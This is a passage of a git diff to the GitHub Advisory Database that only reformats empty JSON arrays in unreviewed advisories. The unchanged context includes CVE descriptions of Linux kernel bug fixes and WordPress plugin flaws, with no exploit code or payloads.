"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-78fg-6v4v-6w8m/GHSA-78fg-6v4v-6w8m.json b/advisories/unreviewed/2024/03/GHSA-78fg-6v4v-6w8m/GHSA-78fg-6v4v-6w8m.json
index 8e47f5f88a5..96bcf980aea 100644
--- a/advisories/unreviewed/2024/03/GHSA-78fg-6v4v-6w8m/GHSA-78fg-6v4v-6w8m.json
+++ b/advisories/unreviewed/2024/03/GHSA-78fg-6v4v-6w8m/GHSA-78fg-6v4v-6w8m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-79q8-cx3j-4wrg/GHSA-79q8-cx3j-4wrg.json b/advisories/unreviewed/2024/03/GHSA-79q8-cx3j-4wrg/GHSA-79q8-cx3j-4wrg.json
index c894efc2f68..451623ad268 100644
--- a/advisories/unreviewed/2024/03/GHSA-79q8-cx3j-4wrg/GHSA-79q8-cx3j-4wrg.json
+++ b/advisories/unreviewed/2024/03/GHSA-79q8-cx3j-4wrg/GHSA-79q8-cx3j-4wrg.json
@@ -7,12 +7,8 @@
"CVE-2021-47054"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: qcom: Put child node before return\n\nPut child node before return to fix potential reference count leak.\nGenerally, the reference count of child is incremented and decremented\nautomatically in the macro for_each_available_child_of_node() and should\nbe decremented manually if the loop is broken in loop body.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -52,9 +48,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-7p9v-9x3x-2f79/GHSA-7p9v-9x3x-2f79.json b/advisories/unreviewed/2024/03/GHSA-7p9v-9x3x-2f79/GHSA-7p9v-9x3x-2f79.json
index 8f8b9c6a059..3c339d342e4 100644
--- a/advisories/unreviewed/2024/03/GHSA-7p9v-9x3x-2f79/GHSA-7p9v-9x3x-2f79.json
+++ b/advisories/unreviewed/2024/03/GHSA-7p9v-9x3x-2f79/GHSA-7p9v-9x3x-2f79.json
@@ -7,12 +7,8 @@
"CVE-2021-47065"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nrtw88: Fix array overrun in rtw_get_tx_power_params()\n\nUsing a kernel with the Undefined Behaviour Sanity Checker (UBSAN) enabled, the\nfollowing array overrun is logged:\n\n================================================================================\nUBSAN: array-index-out-of-bounds in /home/finger/wireless-drivers-next/drivers/net/wireless/realtek/rtw88/phy.c:1789:34\nindex 5 is out of range for type 'u8 [5]'\nCPU: 2 PID: 84 Comm: kworker/u16:3 Tainted: G O 5.12.0-rc5-00086-gd88bba47038e-dirty #651\nHardware name: TOSHIBA TECRA A50-A/TECRA A50-A, BIOS Version 4.50 09/29/2014\nWorkqueue: phy0 ieee80211_scan_work [mac80211]\nCall Trace:\n dump_stack+0x64/0x7c\n ubsan_epilogue+0x5/0x40\n __ubsan_handle_out_of_bounds.cold+0x43/0x48\n rtw_get_tx_power_params+0x83a/drivers/net/wireless/realtek/rtw88/0xad0 [rtw_core]\n ? rtw_pci_read16+0x20/0x20 [rtw_pci]\n ? check_hw_ready+0x50/0x90 [rtw_core]\n rtw_phy_get_tx_power_index+0x4d/0xd0 [rtw_core]\n rtw_phy_set_tx_power_level+0xee/0x1b0 [rtw_core]\n rtw_set_channel+0xab/0x110 [rtw_core]\n rtw_ops_config+0x87/0xc0 [rtw_core]\n ieee80211_hw_config+0x9d/0x130 [mac80211]\n ieee80211_scan_state_set_channel+0x81/0x170 [mac80211]\n ieee80211_scan_work+0x19f/0x2a0 [mac80211]\n process_one_work+0x1dd/0x3a0\n worker_thread+0x49/0x330\n ? rescuer_thread+0x3a0/0x3a0\n kthread+0x134/0x150\n ? kthread_create_worker_on_cpu+0x70/0x70\n ret_from_fork+0x22/0x30\n================================================================================\n\nThe statement where an array is being overrun is shown in the following snippet:\n\n\tif (rate <= DESC_RATE11M)\n\t\ttx_power = pwr_idx_2g->cck_base[group];\n\telse\n====>\t\ttx_power = pwr_idx_2g->bw40_base[group];\n\nThe associated arrays are defined in main.h as follows:\n\nstruct rtw_2g_txpwr_idx {\n\tu8 cck_base[6];\n\tu8 bw40_base[5];\n\tstruct rtw_2g_1s_pwr_idx_diff ht_1s_diff;\n\tstruct rtw_2g_ns_pwr_idx_diff ht_2s_diff;\n\tstruct rtw_2g_ns_pwr_idx_diff ht_3s_diff;\n\tstruct rtw_2g_ns_pwr_idx_diff ht_4s_diff;\n};\n\nThe problem arises because the value of group is 5 for channel 14. The trivial\nincrease in the dimension of bw40_base fails as this struct must match the layout of\nefuse. The fix is to add the rate as an argument to rtw_get_channel_group() and set\nthe group for channel 14 to 4 if rate <= DESC_RATE11M.\n\nThis patch fixes commit fa6dfe6bff24 (\"rtw88: resolve order of tx power setting routines\")",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -40,9 +36,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-7wc9-x26x-7jcr/GHSA-7wc9-x26x-7jcr.json b/advisories/unreviewed/2024/03/GHSA-7wc9-x26x-7jcr/GHSA-7wc9-x26x-7jcr.json
index ce301fbea6d..9c850dd5e80 100644
--- a/advisories/unreviewed/2024/03/GHSA-7wc9-x26x-7jcr/GHSA-7wc9-x26x-7jcr.json
+++ b/advisories/unreviewed/2024/03/GHSA-7wc9-x26x-7jcr/GHSA-7wc9-x26x-7jcr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-82p8-25ww-x6g6/GHSA-82p8-25ww-x6g6.json b/advisories/unreviewed/2024/03/GHSA-82p8-25ww-x6g6/GHSA-82p8-25ww-x6g6.json
index 8bfaa4d19ec..15f6965a096 100644
--- a/advisories/unreviewed/2024/03/GHSA-82p8-25ww-x6g6/GHSA-82p8-25ww-x6g6.json
+++ b/advisories/unreviewed/2024/03/GHSA-82p8-25ww-x6g6/GHSA-82p8-25ww-x6g6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-82r6-xqp6-439v/GHSA-82r6-xqp6-439v.json b/advisories/unreviewed/2024/03/GHSA-82r6-xqp6-439v/GHSA-82r6-xqp6-439v.json
index 67927a97550..83e8cbf5a27 100644
--- a/advisories/unreviewed/2024/03/GHSA-82r6-xqp6-439v/GHSA-82r6-xqp6-439v.json
+++ b/advisories/unreviewed/2024/03/GHSA-82r6-xqp6-439v/GHSA-82r6-xqp6-439v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-8gv8-jqm3-r824/GHSA-8gv8-jqm3-r824.json b/advisories/unreviewed/2024/03/GHSA-8gv8-jqm3-r824/GHSA-8gv8-jqm3-r824.json
index 72f30e2b8df..fb400cd800e 100644
--- a/advisories/unreviewed/2024/03/GHSA-8gv8-jqm3-r824/GHSA-8gv8-jqm3-r824.json
+++ b/advisories/unreviewed/2024/03/GHSA-8gv8-jqm3-r824/GHSA-8gv8-jqm3-r824.json
@@ -7,12 +7,8 @@
"CVE-2021-47016"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nm68k: mvme147,mvme16x: Don't wipe PCC timer config bits\n\nDon't clear the timer 1 configuration bits when clearing the interrupt flag\nand counter overflow. As Michael reported, \"This results in no timer\ninterrupts being delivered after the first. Initialization then hangs\nin calibrate_delay as the jiffies counter is not updated.\"\n\nOn mvme16x, enable the timer after requesting the irq, consistent with\nmvme147.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -40,9 +36,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-8j2x-98w6-cr3m/GHSA-8j2x-98w6-cr3m.json b/advisories/unreviewed/2024/03/GHSA-8j2x-98w6-cr3m/GHSA-8j2x-98w6-cr3m.json
index 33979b6fea6..daf1950ed9e 100644
--- a/advisories/unreviewed/2024/03/GHSA-8j2x-98w6-cr3m/GHSA-8j2x-98w6-cr3m.json
+++ b/advisories/unreviewed/2024/03/GHSA-8j2x-98w6-cr3m/GHSA-8j2x-98w6-cr3m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-c737-8pj3-c7c7/GHSA-c737-8pj3-c7c7.json b/advisories/unreviewed/2024/03/GHSA-c737-8pj3-c7c7/GHSA-c737-8pj3-c7c7.json
index f5fa34f4450..67f8d38970c 100644
--- a/advisories/unreviewed/2024/03/GHSA-c737-8pj3-c7c7/GHSA-c737-8pj3-c7c7.json
+++ b/advisories/unreviewed/2024/03/GHSA-c737-8pj3-c7c7/GHSA-c737-8pj3-c7c7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-cwg6-9jmv-938r/GHSA-cwg6-9jmv-938r.json b/advisories/unreviewed/2024/03/GHSA-cwg6-9jmv-938r/GHSA-cwg6-9jmv-938r.json
index 45acb1a8283..e73fce618e3 100644
--- a/advisories/unreviewed/2024/03/GHSA-cwg6-9jmv-938r/GHSA-cwg6-9jmv-938r.json
+++ b/advisories/unreviewed/2024/03/GHSA-cwg6-9jmv-938r/GHSA-cwg6-9jmv-938r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-f2cq-j285-crf8/GHSA-f2cq-j285-crf8.json b/advisories/unreviewed/2024/03/GHSA-f2cq-j285-crf8/GHSA-f2cq-j285-crf8.json
index 15c9a0e08b2..d028f772eaf 100644
--- a/advisories/unreviewed/2024/03/GHSA-f2cq-j285-crf8/GHSA-f2cq-j285-crf8.json
+++ b/advisories/unreviewed/2024/03/GHSA-f2cq-j285-crf8/GHSA-f2cq-j285-crf8.json
@@ -7,12 +7,8 @@
"CVE-2021-47066"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nasync_xor: increase src_offs when dropping destination page\n\nNow we support sharing one page if PAGE_SIZE is not equal stripe size. To\nsupport this, it needs to support calculating xor value with different\noffsets for each r5dev. One offset array is used to record those offsets.\n\nIn RMW mode, parity page is used as a source page. It sets\nASYNC_TX_XOR_DROP_DST before calculating xor value in ops_run_prexor5.\nSo it needs to add src_list and src_offs at the same time. Now it only\nneeds src_list. So the xor value which is calculated is wrong. It can\ncause data corruption problem.\n\nI can reproduce this problem 100% on a POWER8 machine. The steps are:\n\n mdadm -CR /dev/md0 -l5 -n3 /dev/sdb1 /dev/sdc1 /dev/sdd1 --size=3G\n mkfs.xfs /dev/md0\n mount /dev/md0 /mnt/test\n mount: /mnt/test: mount(2) system call failed: Structure needs cleaning.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-f5x9-85f3-f3r4/GHSA-f5x9-85f3-f3r4.json b/advisories/unreviewed/2024/03/GHSA-f5x9-85f3-f3r4/GHSA-f5x9-85f3-f3r4.json
index 94d38d35b9e..6cd5f493649 100644
--- a/advisories/unreviewed/2024/03/GHSA-f5x9-85f3-f3r4/GHSA-f5x9-85f3-f3r4.json
+++ b/advisories/unreviewed/2024/03/GHSA-f5x9-85f3-f3r4/GHSA-f5x9-85f3-f3r4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-f8jx-pmvg-jgfh/GHSA-f8jx-pmvg-jgfh.json b/advisories/unreviewed/2024/03/GHSA-f8jx-pmvg-jgfh/GHSA-f8jx-pmvg-jgfh.json
index 5c3ffc8e42e..ccd52b8107b 100644
--- a/advisories/unreviewed/2024/03/GHSA-f8jx-pmvg-jgfh/GHSA-f8jx-pmvg-jgfh.json
+++ b/advisories/unreviewed/2024/03/GHSA-f8jx-pmvg-jgfh/GHSA-f8jx-pmvg-jgfh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -47,9 +45,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-fmjh-vg9p-v4cg/GHSA-fmjh-vg9p-v4cg.json b/advisories/unreviewed/2024/03/GHSA-fmjh-vg9p-v4cg/GHSA-fmjh-vg9p-v4cg.json
index 6349d026fba..92acce50b67 100644
--- a/advisories/unreviewed/2024/03/GHSA-fmjh-vg9p-v4cg/GHSA-fmjh-vg9p-v4cg.json
+++ b/advisories/unreviewed/2024/03/GHSA-fmjh-vg9p-v4cg/GHSA-fmjh-vg9p-v4cg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-fxj6-8fmc-7h79/GHSA-fxj6-8fmc-7h79.json b/advisories/unreviewed/2024/03/GHSA-fxj6-8fmc-7h79/GHSA-fxj6-8fmc-7h79.json
index 24b964c3d1a..3f1ffe5be8c 100644
--- a/advisories/unreviewed/2024/03/GHSA-fxj6-8fmc-7h79/GHSA-fxj6-8fmc-7h79.json
+++ b/advisories/unreviewed/2024/03/GHSA-fxj6-8fmc-7h79/GHSA-fxj6-8fmc-7h79.json
@@ -7,12 +7,8 @@
"CVE-2024-0780"
],
"details": "The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation when resetting its database, allowing any authenticated users, such as subscriber to perform such action",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-g6q3-47r5-q8fc/GHSA-g6q3-47r5-q8fc.json b/advisories/unreviewed/2024/03/GHSA-g6q3-47r5-q8fc/GHSA-g6q3-47r5-q8fc.json
index aedfc9a3642..1e7be6727aa 100644
--- a/advisories/unreviewed/2024/03/GHSA-g6q3-47r5-q8fc/GHSA-g6q3-47r5-q8fc.json
+++ b/advisories/unreviewed/2024/03/GHSA-g6q3-47r5-q8fc/GHSA-g6q3-47r5-q8fc.json
@@ -7,12 +7,8 @@
"CVE-2021-47063"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: bridge/panel: Cleanup connector on bridge detach\n\nIf we don't call drm_connector_cleanup() manually in\npanel_bridge_detach(), the connector will be cleaned up with the other\nDRM objects in the call to drm_mode_config_cleanup(). However, since our\ndrm_connector is devm-allocated, by the time drm_mode_config_cleanup()\nwill be called, our connector will be long gone. Therefore, the\nconnector must be cleaned up when the bridge is detached to avoid\nuse-after-free conditions.\n\nv2: Cleanup connector only if it was created\n\nv3: Add FIXME\n\nv4: (Use connector->dev) directly in if() block",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-gm6q-8vw8-pwh3/GHSA-gm6q-8vw8-pwh3.json b/advisories/unreviewed/2024/03/GHSA-gm6q-8vw8-pwh3/GHSA-gm6q-8vw8-pwh3.json
index 1597d95058a..393644d5560 100644
--- a/advisories/unreviewed/2024/03/GHSA-gm6q-8vw8-pwh3/GHSA-gm6q-8vw8-pwh3.json
+++ b/advisories/unreviewed/2024/03/GHSA-gm6q-8vw8-pwh3/GHSA-gm6q-8vw8-pwh3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-jc3j-vf3f-q43p/GHSA-jc3j-vf3f-q43p.json b/advisories/unreviewed/2024/03/GHSA-jc3j-vf3f-q43p/GHSA-jc3j-vf3f-q43p.json
index 09e29950301..8038a6132a7 100644
--- a/advisories/unreviewed/2024/03/GHSA-jc3j-vf3f-q43p/GHSA-jc3j-vf3f-q43p.json
+++ b/advisories/unreviewed/2024/03/GHSA-jc3j-vf3f-q43p/GHSA-jc3j-vf3f-q43p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -51,9 +49,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-m647-h22j-v38q/GHSA-m647-h22j-v38q.json b/advisories/unreviewed/2024/03/GHSA-m647-h22j-v38q/GHSA-m647-h22j-v38q.json
index c609fdec10d..a586be242a6 100644
--- a/advisories/unreviewed/2024/03/GHSA-m647-h22j-v38q/GHSA-m647-h22j-v38q.json
+++ b/advisories/unreviewed/2024/03/GHSA-m647-h22j-v38q/GHSA-m647-h22j-v38q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-mcqr-9wgj-9623/GHSA-mcqr-9wgj-9623.json b/advisories/unreviewed/2024/03/GHSA-mcqr-9wgj-9623/GHSA-mcqr-9wgj-9623.json
index cb675590914..78124def85e 100644
--- a/advisories/unreviewed/2024/03/GHSA-mcqr-9wgj-9623/GHSA-mcqr-9wgj-9623.json
+++ b/advisories/unreviewed/2024/03/GHSA-mcqr-9wgj-9623/GHSA-mcqr-9wgj-9623.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-mv3g-77hg-5wrg/GHSA-mv3g-77hg-5wrg.json b/advisories/unreviewed/2024/03/GHSA-mv3g-77hg-5wrg/GHSA-mv3g-77hg-5wrg.json
index e56d6c4db50..0d86e337bd4 100644
--- a/advisories/unreviewed/2024/03/GHSA-mv3g-77hg-5wrg/GHSA-mv3g-77hg-5wrg.json
+++ b/advisories/unreviewed/2024/03/GHSA-mv3g-77hg-5wrg/GHSA-mv3g-77hg-5wrg.json
@@ -7,12 +7,8 @@
"CVE-2024-0820"
],
"details": "The Jobs for WordPress plugin before 2.7.4 does not sanitise and escape some parameters, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-p64f-v3w3-f3gw/GHSA-p64f-v3w3-f3gw.json b/advisories/unreviewed/2024/03/GHSA-p64f-v3w3-f3gw/GHSA-p64f-v3w3-f3gw.json
index b7518bba0e4..2771d633614 100644
--- a/advisories/unreviewed/2024/03/GHSA-p64f-v3w3-f3gw/GHSA-p64f-v3w3-f3gw.json
+++ b/advisories/unreviewed/2024/03/GHSA-p64f-v3w3-f3gw/GHSA-p64f-v3w3-f3gw.json
@@ -7,12 +7,8 @@
"CVE-2021-46959"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: Fix use-after-free with devm_spi_alloc_*\n\nWe can't rely on the contents of the devres list during\nspi_unregister_controller(), as the list is already torn down at the\ntime we perform devres_find() for devm_spi_release_controller. This\ncauses devices registered with devm_spi_alloc_{master,slave}() to be\nmistakenly identified as legacy, non-devm managed devices and have their\nreference counters decremented below 0.\n\n------------[ cut here ]------------\nWARNING: CPU: 1 PID: 660 at lib/refcount.c:28 refcount_warn_saturate+0x108/0x174\n[] (refcount_warn_saturate) from [] (kobject_put+0x90/0x98)\n[] (kobject_put) from [] (put_device+0x20/0x24)\n r4:b6700140\n[] (put_device) from [] (devm_spi_release_controller+0x3c/0x40)\n[] (devm_spi_release_controller) from [] (release_nodes+0x84/0xc4)\n r5:b6700180 r4:b6700100\n[] (release_nodes) from [] (devres_release_all+0x5c/0x60)\n r8:b1638c54 r7:b117ad94 r6:b1638c10 r5:b117ad94 r4:b163dc10\n[] (devres_release_all) from [] (__device_release_driver+0x144/0x1ec)\n r5:b117ad94 r4:b163dc10\n[] (__device_release_driver) from [] (device_driver_detach+0x84/0xa0)\n r9:00000000 r8:00000000 r7:b117ad94 r6:b163dc54 r5:b1638c10 r4:b163dc10\n[] (device_driver_detach) from [] (unbind_store+0xe4/0xf8)\n\nInstead, determine the devm allocation state as a flag on the\ncontroller which is guaranteed to be stable during cleanup.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -56,9 +52,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-pwj3-wjc3-227r/GHSA-pwj3-wjc3-227r.json b/advisories/unreviewed/2024/03/GHSA-pwj3-wjc3-227r/GHSA-pwj3-wjc3-227r.json
index 0dc75f39dbd..508f7572e1e 100644
--- a/advisories/unreviewed/2024/03/GHSA-pwj3-wjc3-227r/GHSA-pwj3-wjc3-227r.json
+++ b/advisories/unreviewed/2024/03/GHSA-pwj3-wjc3-227r/GHSA-pwj3-wjc3-227r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-rr36-3hq5-mqj8/GHSA-rr36-3hq5-mqj8.json b/advisories/unreviewed/2024/03/GHSA-rr36-3hq5-mqj8/GHSA-rr36-3hq5-mqj8.json
index fe580c0d515..3503e77c2d6 100644
--- a/advisories/unreviewed/2024/03/GHSA-rr36-3hq5-mqj8/GHSA-rr36-3hq5-mqj8.json
+++ b/advisories/unreviewed/2024/03/GHSA-rr36-3hq5-mqj8/GHSA-rr36-3hq5-mqj8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-v9j9-5qh2-v6qr/GHSA-v9j9-5qh2-v6qr.json b/advisories/unreviewed/2024/03/GHSA-v9j9-5qh2-v6qr/GHSA-v9j9-5qh2-v6qr.json
index 6bb513830cf..5f3cc61b6f2 100644
--- a/advisories/unreviewed/2024/03/GHSA-v9j9-5qh2-v6qr/GHSA-v9j9-5qh2-v6qr.json
+++ b/advisories/unreviewed/2024/03/GHSA-v9j9-5qh2-v6qr/GHSA-v9j9-5qh2-v6qr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-vf74-j427-jc3g/GHSA-vf74-j427-jc3g.json b/advisories/unreviewed/2024/03/GHSA-vf74-j427-jc3g/GHSA-vf74-j427-jc3g.json
index 4591cb74e30..71986594dca 100644
--- a/advisories/unreviewed/2024/03/GHSA-vf74-j427-jc3g/GHSA-vf74-j427-jc3g.json
+++ b/advisories/unreviewed/2024/03/GHSA-vf74-j427-jc3g/GHSA-vf74-j427-jc3g.json
@@ -7,12 +7,8 @@
"CVE-2024-0951"
],
"details": "The Advanced Social Feeds Widget & Shortcode WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-vgx2-q9gg-j722/GHSA-vgx2-q9gg-j722.json b/advisories/unreviewed/2024/03/GHSA-vgx2-q9gg-j722/GHSA-vgx2-q9gg-j722.json
index 22ce8804556..a2a0e7a3f3e 100644
--- a/advisories/unreviewed/2024/03/GHSA-vgx2-q9gg-j722/GHSA-vgx2-q9gg-j722.json
+++ b/advisories/unreviewed/2024/03/GHSA-vgx2-q9gg-j722/GHSA-vgx2-q9gg-j722.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-vw3g-79h8-v7f8/GHSA-vw3g-79h8-v7f8.json b/advisories/unreviewed/2024/03/GHSA-vw3g-79h8-v7f8/GHSA-vw3g-79h8-v7f8.json
index f60323ff00f..c3398fbd49e 100644
--- a/advisories/unreviewed/2024/03/GHSA-vw3g-79h8-v7f8/GHSA-vw3g-79h8-v7f8.json
+++ b/advisories/unreviewed/2024/03/GHSA-vw3g-79h8-v7f8/GHSA-vw3g-79h8-v7f8.json
@@ -7,12 +7,8 @@
"CVE-2021-47067"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsoc/tegra: regulators: Fix locking up when voltage-spread is out of range\n\nFix voltage coupler lockup which happens when voltage-spread is out\nof range due to a bug in the code. The max-spread requirement shall be\naccounted when CPU regulator doesn't have consumers. This problem is\nobserved on Tegra30 Ouya game console once system-wide DVFS is enabled\nin a device-tree.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-wf6g-6473-wm39/GHSA-wf6g-6473-wm39.json b/advisories/unreviewed/2024/03/GHSA-wf6g-6473-wm39/GHSA-wf6g-6473-wm39.json
index 5b92dbaa88d..94bf1c0dd6b 100644
--- a/advisories/unreviewed/2024/03/GHSA-wf6g-6473-wm39/GHSA-wf6g-6473-wm39.json
